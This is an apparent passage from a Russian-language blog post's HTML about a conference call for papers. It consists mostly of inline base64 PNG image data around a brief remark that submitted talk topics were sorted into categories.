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" /><br />
<br />
Далее - темы докладов. Нам прислали много разных тем, и я не поленился и разбил их по категориям. Очевидно, что имеются пересечения, но я выбирал основную.<br />
Очень радует разносторонность интересов наших участников CFP.<br />
<br />
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAqUAAAHLCAYAAADxzuGFAAAgAElEQVR4XuydB1SVx9aGX3qTLoICFsACasR2saDGEo0lauwlllhi19h7jb3FFkuixhg19kRNrNgrSYwlSiwoIlhQ6dLbXfMZCCLI4XA676yV5X9zZvbs/cyXf73umT2jl5GRkQE2EiABEiABEiABEiABElAjAT2KUjXS59QkQAIkQAIkQAIkQAISAYpSfggkQAIkQAIkQAIkQAJqJ0BRqvYloAMkQAIkQAIkQAIkQAIUpfwGSIAESIAESIAESIAE1E6AolTtS0AHSIAESIAESIAESIAEKEr5DZAACZAACZAACZAACaidAEWp2peADpAACZAACZAACZAACVCU8hsgARIgARIgARIgARJQOwGKUrUvAR0gARIgARIgARIgARKgKOU3QAIkQAIkQAIkQAIkoHYCFKVqXwI6QAIkQAIkQAIkQAIkQFHKb4AESIAESIAESIAESEDtBChK1b4EdIAESIAESIAESIAESICilN8ACZAACZAACZAACZCA2glQlKp9CegACZAACZAACZAACZAARSm/ARIgARIgARIgARIgAbUToChV+xLQARIgARIgARIgARIgAYpSfgMkQAIkQAIkQAIkQAJqJ0BRqvYloAMkQAIkQAIkQAIkQAIUpfwGSIAESIAESIAESIAE1E6AolTtS0AHSIAESIAESIAESIAEKEr5DZAACZAACZAACZAACaidAEWp2peADpAACZAACZAACZAACVCU8hsgARIgARIgARIgARJQOwGKUrUvAR0gARIgARIgARIgARKgKOU3QAIkQAIkQAIkQAIk